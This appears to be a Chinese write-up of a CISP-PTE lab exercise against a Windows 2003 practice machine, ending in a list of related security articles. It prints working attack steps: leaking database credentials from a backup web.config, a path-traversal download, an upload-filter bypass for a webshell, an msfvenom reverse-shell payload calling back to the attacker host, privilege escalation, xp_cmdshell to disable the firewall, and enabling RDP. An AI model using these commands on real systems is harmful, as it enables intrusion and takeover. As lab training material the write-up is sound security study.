CISP-PTE靶机

简介: 本文档详细记录了一次针对Windows 2003服务器的渗透测试过程。测试环境包括攻击机(Kali Linux,IP: 192.168.18.130)和靶机(Windows 2003,IP: 192.168.18.145),两者需处于同一局域网内。测试过程中,通过Nmap扫描发现靶机开放了SQL Server端口,进一步利用信息泄露、文件上传漏洞及数据库连接等方式,逐步获取了系统的控制权限,最终实现了远程桌面连接。文中还提供了多种技术细节和操作命令,帮助读者理解每一步的具体实现方法。

实验环境

攻击机:Kali
IP 地址:192.168.18.130
靶机:pte-win2003(windows)
IP 地址:192.168.18.145
网络:两个主机须在同一局域网下,所以虚拟机的网络配置器必须相同

一、信息收集

正常扫描nmap -sS 192.168.18.145 -T4 发现只开放了一个sql-server 随即全端口扫描

访问网站

御剑扫描完发现有爬虫协议

二、解题步骤

访问首页

看看有没有信息泄露

在网络安全和渗透测试中,Git文件泄露是一个重要的考察点,因为它可能导致敏感信息(如源代码、配置文件、密码等)的暴露。

手动检查的方法为url/.git ,这里无法访问但是提示了目标为iis

iis默认配置文件为web.config看看有没有备份文件

http://192.168.18.145:27689/web.config.bak

成功下载并访问,这里把数据库信息显示了出来

链接数据库

查询到密码

登录得到key1

发现目标存在着注入,但是我们已经连接上数据库意义不大,尝试写入一句话木马,或者oshell,尝试失败

这里选择常规的文件上传,测试奇怪后缀也被拦判断为白名单

这里想尝试文件包含图片马,然后默认aspx文件本身就是一个一句话木马,但是被误导了一直找到下载文件的接口去

192.168.18.145:27689/admin/file_down.aspx?file=638596652953750000-111111111.jpg

附:这里通过网上wp发现fuzz之后最终回溯两层目录到web根目录并下载web.config

192.168.18.145:27689/admin/file_down.aspx?file=../../web.cofig

转变思路观察到文件说明上传剪切后缀

经过测试 配合上时间戳后 文件名设置八位刚好jpg被隐藏

上传一句话木马

最后峰回路转在这里发现文件上传路径,真正的文件在这里,不应该去下载文件的,刚上传文件什么的找错了思路,在这里把那个aspx文件下载下来,并且能看到里面的密码,找到该文件的真实位置:

蚁剑连接上去自己上传的马子

成功得到key2

或者直接使用这个木马里面就是一句话木马

手工法

这里登录进来发现数据库的账号密码

查询到key.txt,得到key3

或者后渗透

msf上线

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.130 LPORT=8848 -f exe -o 1.exe

msf6 exploit(multi/hams/steamed) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf6 exploit(multi/handler) > set PORT 8848
LPORT => 8848
msf6 exploit(multi/handler) > exploit

通过剑蚁上传到靶机后,通过虚拟终端shell来运行程序

成功上线后,使用bg维持会话的同时继续执行其他模块,

bg
search ms14_058
use 0
set seesion 1
set LPORT
set LHOST
run

提权成功

解密

meterpreter > run post/windows/manage/enable_rdp

发现开启不了跟着网上的教程走一下msf版本sa提权

msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa
usname => sa
msf6 auxiliary(admin/mssql/mssql_exec) > set password cisp-pte@sa
password => cisp-pte@sa
msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.18.145
RHOSTS => 192.168.18.145
msf6 auxiliary(admin/mssql/mssql_exec) > set RPORT 1433
RPORT => 1433
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe /c "netsh firewall set opmode disable"
CMD => cmd.exe /c netsh firewall set opmode disable
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.18.145
[*] 192.168.18.145:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c netsh firewall set opmode disable'

远连成功

附一个wmic法

开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

相关文章
|
安全 网络安全 PHP
CISP-PTE综合靶机-WinServer2008学习
CISP-PTE综合靶机-WinServer2008学习
1442 0
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
20752 1
|
存储 域名解析 供应链
阿里云 OSS对象存储攻防
本文分为两个部分 第一部分介绍OSS对象存储攻防的方式 第二部分为真实漏洞案例
3787 0
阿里云 OSS对象存储攻防
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
1883 0
|
7月前
|
安全 测试技术 程序员
web渗透-文件包含漏洞
文件包含漏洞源于程序动态包含文件时未严格校验用户输入,导致可加载恶意文件。分为本地和远程包含,常见于PHP,利用伪协议、日志或session文件可实现代码执行,需通过合理过滤和配置防范。
1187 79
web渗透-文件包含漏洞
|
JSON 开发框架 网络安全
[网络安全] Dirsearch 工具的安装、使用详细教程
[网络安全] Dirsearch 工具的安装、使用详细教程
10740 0
|
安全 Shell 网络安全
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
看完这篇 教你玩转渗透测试靶机vulnhub—Emplre: Lupinone
468 0
|
Kubernetes 安全 Cloud Native
云上攻防-云原生篇&K8s安全-Kubelet未授权访问、API Server未授权访问
本文介绍了云原生环境下Kubernetes集群的安全问题及攻击方法。首先概述了云环境下的新型攻击路径,如通过虚拟机攻击云管理平台、容器逃逸控制宿主机等。接着详细解释了Kubernetes集群架构,并列举了常见组件的默认端口及其安全隐患。文章通过具体案例演示了API Server 8080和6443端口未授权访问的攻击过程,以及Kubelet 10250端口未授权访问的利用方法,展示了如何通过这些漏洞实现权限提升和横向渗透。
2058 0
云上攻防-云原生篇&K8s安全-Kubelet未授权访问、API Server未授权访问
|
SQL 安全 数据库
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
2615 1
|
SQL XML 安全
Pikachu SQL 注入通关解析
Pikachu SQL 注入通关解析

热门文章

最新文章

下一篇
开通oss服务